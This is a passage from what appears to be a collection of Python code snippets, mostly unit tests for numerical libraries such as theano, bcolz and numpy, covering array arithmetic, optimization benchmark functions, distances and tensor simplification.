new_point = utils.shift_point(point, 3, 4)\n self.assertEqual((3,4), new_point)\n\n point = (-2.34, 1.19)\n new_point = utils.shift_point(point, 2.34, -1.19)\n self.assertEqual((0,0), new_point)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def test_calculate_distance():\n\n r1 = np.array([0, 0, 0])\n r2 = np.array([0, 1, 0])\n\n expected_distance = 1\n\n calculated_distance = molecool.calculate_distance(r1, r2)\n\n assert expected_distance == calculated_distance", "def test_elemwise1():\r\n\r\n shape = (3, 4)\r\n a = tcn.shared_constructor(theano._asarray(numpy.random.rand(*shape),\r\n dtype='float32') + 0.5, 'a')\r\n b = tensor.fmatrix()\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, b ** a)], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, tensor.exp(b ** a))], mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)\r\n\r\n #let debugmode catch any mistakes\r\n f = pfunc([b], [], updates=[(a, a + b * tensor.exp(b ** a))],\r\n mode=mode_with_gpu)\r\n f(theano._asarray(numpy.random.rand(*shape), dtype='float32') + 0.3)", "def test04(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = 
bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_r():\n y, x = np.indices((10,20))\n\n default_use_numexpr = accel_math._USE_NUMEXPR\n\n accel_math._USE_NUMEXPR = True\n r1 = accel_math._r(x,y)\n\n accel_math._USE_NUMEXPR = False\n r2 = accel_math._r(x,y)\n\n np.testing.assert_almost_equal(r1,r2)\n\n accel_math._USE_NUMEXPR = default_use_numexpr", "def test_vectorized_loss_single_data_point_correct(self):\n W, x, b, correct_class_index, grad_W, grad_b = single_point_correct_test_data() # noqa\n\n loss = vectorized_loss(x, correct_class_index, W, b)\n np.testing.assert_almost_equal(loss, 21)", "def test_equal10():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_single(self):\n df = self.df.head(1).copy()\n n = df.index.size\n arr = df.values\n out = np_cross_ratios(arr)\n self.assertTrue(np.isfinite(out).any())\n self.assertTrue((out[np.isfinite(out)] > 0).all())\n self.assertTrue(out.shape == (n, self.d, self.d))", "def test_alpine2(self):\n fun = get_problem('alpine2', self.dimension, 0.0, 10.0)\n self.assertAlmostEqual(fun(self.array8), np.power(2.8081311800070053291, self.dimension))", "def test_multiple(self):\n df = self.df.copy()\n out = compositional_mean(df)\n # Check closure\n self.assertTrue(np.allclose(np.sum(out.values, axis=-1), 1.0))", "def testDotProduct(self):\n\n self._check([0.000, 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([0.125, 0.750, 0.125], [ 1023, 1023, 1023 ])\n self._check([1/32., 1.000, 0.000], [ 1023, 1023, 1023 ])\n self._check([1.000, 1.000, 1.000], [ 1023, 1023, 1023 ])\n self._check([0, 0, 0], [ 1023, 1023, 1023 ])\n self._check([1/32., 0, 0], [ 1, 100, 100 ])\n self._check([1.0, 0, 0], [ 1, 100, 100 ])\n self._check([0, 1.0, 0], [ 1, 100, 100 ])\n self._check([0, 0, 1.0], [ 1, 100, 100 ])\n self._check([1.000, 1.000, 1.000], [ 513, 513, 513 ])\n self._check([1.000, 1.000, 1.000], [ 512, 512, 512 ])\n self._check([1.000, 1.000, 1.000], [ 0, 512, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 680, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 681, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 682, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 683, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 341, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 342, 0 ])\n\n self._check([0.000, 1.5, 0.000], [ 0, 1023-338, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-339, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-340, 0 ])\n self._check([0.000, 1.5, 0.000], [ 0, 1023-341, 0 ])\n\n self._check([0.000, -1.0, 0.000], [ 0, 500, 0 ])\n self._check([1/32., -1.0, 1/32.], [ 500, 500, 500 ])\n self._check([-1/32., -1.0, -1/32.], [ 400, 400, 400 ])\n\n for idx in range(100):\n data = [ random.randint(0,1023) for r in range(3) ]\n coeff = [ max(-2.0, min(127/32., random.random() * 4 - 2)) for r in range(3) ]\n #print coeff, data\n self._check(coeff, data)", "def test03(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"a * d\")\n nr = a * b\n # print \"bcolz.eval ->\", 
cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_pinter(self):\n fun = get_problem('pinter', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def _sparse_tanimotokernel(data_1, data_2):\n\n norm_1 = np.array(data_1.power(2).sum(axis=1).reshape(data_1.shape[0], 1))\n norm_2 = np.array(data_2.power(2).sum(axis=1).reshape(data_2.shape[0], 1))\n prod = data_1.dot(data_2.T).A\n\n divisor = (norm_1 + norm_2.T - prod) + np.finfo(data_1.dtype).eps\n result = prod / divisor\n return result", "def problem1(self, s):\n\n # Test with good inputs (4 points)\n x = np.array([1, 2])\n y = np.array([2, 2])\n points = self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")\n \n x = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n y = np.array([2, 6, 4, 8, 0, 2, 4, 7, 5, 11])\n points += self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")\n \n x = (np.random.random(100)-.5)*200\n y = (np.random.random(100)-.5)*200\n points += self.numTest(euclidean_metric(x,y), s.euclidean_metric(x,y),\n \"\\n\\teuclidean_metric() failed.\")*2\n \n # Test with bad inputs (1 point)\n x = np.array([1, 2])\n y = np.array([1, 2, 3])\n try:\n s.euclidean_metric(x, y)\n self.feedback += \"\\n\\teuclidean_metric() failed to raise a \"\n self.feedback += \"ValueError for vectors of different lengths\"\n except:\n points += 1\n\n return points", "def user_function(x, y):\r\n return x ** 2 + 2 * y ** 2", "def double(input):\r\n assert_array_equal = np.testing.assert_array_equal\r\n\r\n data, position, expected = input\r\n if expected is not None:\r\n assert_equal(data[position], expected)\r\n data[position] *= 2\r\n if expected is not None:\r\n assert_array_equal(data[position], 2 * expected)", "def test_array_sum_equals_one(self):\n plugin = NonLinearWeights(0.85)\n result = plugin.process(self.cube, self.coord_name)\n self.assertAlmostEqual(result.data.sum(), 1.0)", "def test_equal4():\n x = np.array([[1, 2, 3]])\n y = np.array([[[[1, 2, 3], [1, 2, 3], [1, 2, 3]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_suite():\n test(sum_of_squares([2, 3, 4]) == 29)\n test(sum_of_squares([ ]) == 0)\n test(sum_of_squares([2, -3, 4]) == 29)", "def test052_2d_numerical_comparison_on_vs_np_mp(\n self,\n batch_size=8,\n num_features=16,\n height=45,\n width=64,\n alpha_fwd=0.99,\n alpha_bkw=0.99,\n itrs=2,\n ):\n # create inputs\n np_inputs = np.random.randn(batch_size, num_features, height, width) + .25\n # instantiate gradient at the output\n np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125\n\n tf.keras.backend.set_floatx('float16')\n\n self.template_numerical_comparison_on_vs_np(\n np_inputs,\n np_grad_out=np_grad_out,\n axis=1,\n alpha_fwd=alpha_fwd,\n alpha_bkw=alpha_bkw,\n itrs=itrs,\n dtype=Policy('infer_float32_vars'),\n )", "def test_michalewicz(self):\n fun = get_problem('michalewicz', dimension=2, lower=0, upper=np.pi)\n self.assertAlmostEqual(fun(np.asarray([2.20, 1.57])), -1.8013, delta=1e-3)", "def test(self, x, y, z):\n return self.a*x + self.b*y + self.c*z + self.d", "def _SP(xdata, mx, ydata, my):\n if mx is None:\n mx = mean(xdata)\n if my is None:\n my = mean(ydata)\n return _generalised_sum(zip(xdata, ydata), lambda t: (t[0]-mx)*(t[1]-my))", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. 
Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide 
bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_point_with_zero_value_is_good():\n point = np.array([0, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_whitley(self):\n fun = get_problem('whitley', self.dimension)\n self.assertEqual(fun(self.array2), 0.0)", "def test_multiple_case(self):\r\n\r\n shp = (3, 3)\r\n fx, fy, fz, fw = fmatrices('xyzw')\r\n dx, dy, dz, dw = dmatrices('xyzw')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fwv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dwv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.including('ShapeOpt')\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n\r\n #test x / x -> 1\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([(fx/fx,[fx],[fxv],'float32'),\r\n (dx/dx,[dx],[dxv],'float64'),\r\n (fv/fv,[fv],[fvv],'float32'),\r\n (dv/dv,[dv],[dvv],'float64'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert (out == numpy.ones(shp, dtype=out_dtype)).all()\r\n topo = f.maker.fgraph.toposort()\r\n if sym_inputs[0].broadcastable[0]:\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, tensor.Alloc)\r\n else:\r\n assert len(topo) == 3\r\n assert isinstance(topo[0].op, Shape_i)\r\n assert isinstance(topo[1].op, Shape_i)\r\n assert isinstance(topo[2].op, tensor.Alloc)\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (x * y) / x -> y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx*dy)/dx,[dx,dy],[dxv,dyv],0,'float64'),\r\n ((fx*fy)/fx,[fx,fy],[fxv,fyv],0,'float32'),\r\n ((dv*dy)/dv,[dv,dy],[dvv,dyv],0,'float64'),\r\n ((fv*fy)/fv,[fv,fy],[fvv,fyv],0,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n ((dx*dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Elemwise{second,no_inplace}(x, <TensorType(float64, row)>)]\r\n ((fx*fv)/fx,[fx,fv],[fxv,fvv],1,'float32')\r\n #topo: [Elemwise{second,no_inplace}(x, 
<TensorType(float32, row)>)]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert(out_dtype == out.dtype)\r\n assert numpy.allclose(out, val_inputs[1])\r\n topo = f.maker.fgraph.toposort()\r\n print \"ID TOPO\", id, topo, sym_inputs\r\n for r, t in f.maker.fgraph.shape_feature.shape_of.items():\r\n print ' ', r, t\r\n if topo and not(len(topo)==1 and topo[0].op==deep_copy_op):\r\n for node in topo[:-1]:\r\n assert isinstance(node.op, Shape_i)\r\n assert isinstance(topo[-1].op, tensor.Alloc)\r\n\r\n #test x / y / x -> 1 / y\r\n for id,(g, sym_inputs, val_inputs, nb_elemwise, out_dtype) in enumerate([\r\n ((dx/dy)/dx,[dx,dy],[dxv,dyv],1,'float64'),\r\n ((fx/fy)/fx,[fx,fy],[fxv,fyv],1,'float32'),\r\n ((dv/dy)/dv,[dv,dy],[dvv,dyv],1,'float64'),\r\n ((fv/fy)/fv,[fv,fy],[fvv,fyv],1,'float32'),\r\n #must broadcast as their is a dimshuffle in the computation\r\n\r\n ((dx/dv)/dx,[dx,dv],[dxv,dvv],1,'float64'),\r\n #topo: [Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float64, row)>), Alloc]\r\n ((fx/fv)/fx,[fx,fv],[fxv,fvv],1,'float32'),\r\n #topo:[Shape_i, Shape_i, Elemwise{inv,no_inplace}(<TensorType(float32, row)>), Alloc]\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (1 / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n print topo\r\n elem = [t for t in topo if isinstance(t.op, T.Elemwise)]\r\n assert len(elem) == nb_elemwise\r\n assert isinstance(elem[0].op, (T.Elemwise, ))\r\n assert isinstance(elem[0].op.scalar_op, (\r\n theano.scalar.basic.Inv, theano.scalar.basic.TrueDiv))\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (a / b) * (b / c) * (c / d) -> a / d\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((dx / dy) * (dy / dz) * (dz / dw),[dx,dy,dz,dw],[dxv,dyv,dzv,dwv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fw),[fx,fy,fz,fw],[fxv,fyv,fzv,fwv],'float32'),\r\n ((dv / dy) * (dy / dz) * (dz / dw),[dv,dy,dz,dw],[dvv,dyv,dzv,dwv],'float64'),\r\n ((fv / fy) * (fy / fz) * (fz / fw),[fv,fy,fz,fw],[fvv,fyv,fzv,fwv],'float32'),\r\n ((dx / dv) * (dv / dz) * (dz / dw),[dx,dv,dz,dw],[dxv,dvv,dzv,dwv],'float64'),\r\n ((fx / fv) * (fv / fz) * (fz / fw),[fx,fv,fz,fw],[fxv,fvv,fzv,fwv],'float32'),\r\n ((dx / dy) * (dy / dv) * (dv / dw),[dx,dy,dv,dw],[dxv,dyv,dvv,dwv],'float64'),\r\n ((fx / fy) * (fy / fv) * (fv / fw),[fx,fy,fv,fw],[fxv,fyv,fvv,fwv],'float32'),\r\n ((dx / dy) * (dy / dz) * (dz / dv),[dx,dy,dz,dv],[dxv,dyv,dzv,dvv],'float64'),\r\n ((fx / fy) * (fy / fz) * (fz / fv),[fx,fy,fz,fv],[fxv,fyv,fzv,fvv],'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (val_inputs[0] / val_inputs[3]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[0].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test (2.0 * x) / (4.0 * y) -> (0.5 * x) / y\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (((2.0*dx)/(4.0*dy)),[dx,dy],[dxv,dyv],'float64'),\r\n (((2.0*fx)/(4.0*fy)),[fx,fy],[fxv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (((2.0*dv)/(4.0*dy)),[dv,dy],[dvv,dyv],'float64'),\r\n (((2.0*fv)/(4.0*fy)),[fv,fy],[fvv,fyv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n 
(((2.0*dx)/(4.0*dv)),[dx,dv],[dxv,dvv],'float64'),\r\n (((2.0*fx)/(4.0*fv)),[fx,fv],[fxv,fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, (0.5 *\r\n val_inputs[0] / val_inputs[1]))\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 2\r\n assert isinstance(topo[0].op, (T.Elemwise, ))\r\n assert isinstance(topo[0].op.scalar_op,\r\n theano.scalar.basic.Mul)\r\n assert len(topo[0].inputs) == 2\r\n assert isinstance(topo[1].op, (T.Elemwise, ))\r\n assert isinstance(topo[1].op.scalar_op,\r\n theano.scalar.basic.TrueDiv)\r\n assert len(topo[1].inputs) == 2\r\n assert(out_dtype == out.dtype)\r\n\r\n #test 2 * x / 2 -> x\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2*dx)/2,[dx],[dxv],'float64'),\r\n ((2*fx)/2,[fx],[fxv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2*dv)/2,[dv],[dvv],'float64'),\r\n ((2*fv)/2,[fv],[fvv], {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.allclose(out, val_inputs[0])\r\n topo = f.maker.fgraph.toposort()\r\n assert len(topo) == 1\r\n topo[0].op == deep_copy_op\r\n assert(out_dtype == out.dtype)\r\n\r\n #test x / abs(x) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n (dx/abs(dx),[dx],[0.5-dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.5-fxv], 'float32'),\r\n (dx/abs(dx),[dx],[0.1*dxv],'float64'),\r\n (fx/abs(fx),[fx],[0.1*fxv], 'float32'),\r\n (dv/abs(dv),[dv],[0.5-dvv],'float64'),\r\n (fv/abs(fv),[fv],[0.5-fvv], 'float32'),\r\n ]):\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]))\r\n assert(out_dtype == out.dtype)\r\n assert len(f.maker.fgraph.toposort()) == 1\r\n\r\n #test (2*x) / (3*abs(x)) -> sign(x)\r\n for id, (g, sym_inputs, val_inputs, out_dtype) in enumerate([\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.5 - dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.5 - fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dx) / (3 * abs(dx)), [dx], [0.1 * dxv], 'float64'),\r\n ((2 * fx) / (3 * abs(fx)), [fx], [0.1 * fxv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ((2 * dv) / (3 * abs(dv)), [dv], [0.5 - dvv], 'float64'),\r\n ((2 * fv) / (3 * abs(fv)), [fv], [0.5 - fvv],\r\n {'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n ]):\r\n\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n mode=mode)\r\n topo = f.maker.fgraph.toposort()\r\n out = f(*val_inputs)\r\n assert numpy.all(numpy.isfinite(out))\r\n assert numpy.allclose(out, numpy.sign(val_inputs[0]) * 2 / 3)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_y_before_x(self):", "def test_mw_test(self):\r\n U, p = mw_test(self.x, self.y)\r\n self.assertFloatEqual(U, 123.5)\r\n self.assertTrue(0.02 <= p <= 0.05)", "def test_cressman_point(test_data):\n xp, yp, z = test_data\n\n r = 40\n\n obs_tree = 
cKDTree(list(zip(xp, yp)))\n\n indices = obs_tree.query_ball_point([30, 30], r=r)\n\n dists = dist_2(30, 30, xp[indices], yp[indices])\n values = z[indices]\n\n truth = 1.05499444404\n\n value = cressman_point(dists, values, r)\n\n assert_almost_equal(truth, value)", "def test__point_addition__given_point_and_vector__return_correct_point():\n assert Point((0, 1, 2)) + Vector((3, 4, 5)) == Point((3, 5, 7))", "def test_multiply(self):\n self.assertEqual(work_file.multiply(10, 5), 50)\n self.assertEqual(work_file.multiply(-1, 1), -1)\n self.assertEqual(work_file.multiply(-1, -1), 1)", "def test_expression(x, y, z):\n return x * y + y / z", "def test__point_subtraction__given_two_points__return_correct_vector():\n assert Point((0, 1, 2)) - Point((3, 4, 5)) == Vector((-3, -3, -3))", "def test_twoSum(self):\n self.assertEqual(twoSum([2, 7, 11, 15], 9), [0, 1])", "def test13(self):\n a = bcolz.ones((self.N, 1))\n b = bcolz.zeros(a.shape)\n b = bcolz.eval('a + b')\n self.assertEqual(b.sum(), self.N)", "def test_tensor_can_be_added_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n i, j = p.R_dumms[:2]\n x = IndexedBase('x')\n y = IndexedBase('y')\n\n tensor = dr.sum((i, p.R), x[i, j] * y[j, i])\n\n for res in [\n dr.einst(tensor),\n dr.sum((j, p.R), tensor)\n ]:\n assert res == dr.einst(x[i, j] * y[j, i])", "def test_add(x, y, expected):\n\n assert add(x, y) == pytest.approx(add(y, x)) == pytest.approx(expected)", "def test05(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = bcolz.eval(\"a + 2 * d - 3\")\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def test_pearson_r_integer():\n da = xr.DataArray([0, 1, 2], dims=[\"time\"])\n assert pearson_r(da, da, dim=\"time\") == 1", "def _process(self, data: np.array) -> np.array:\n # pylint: 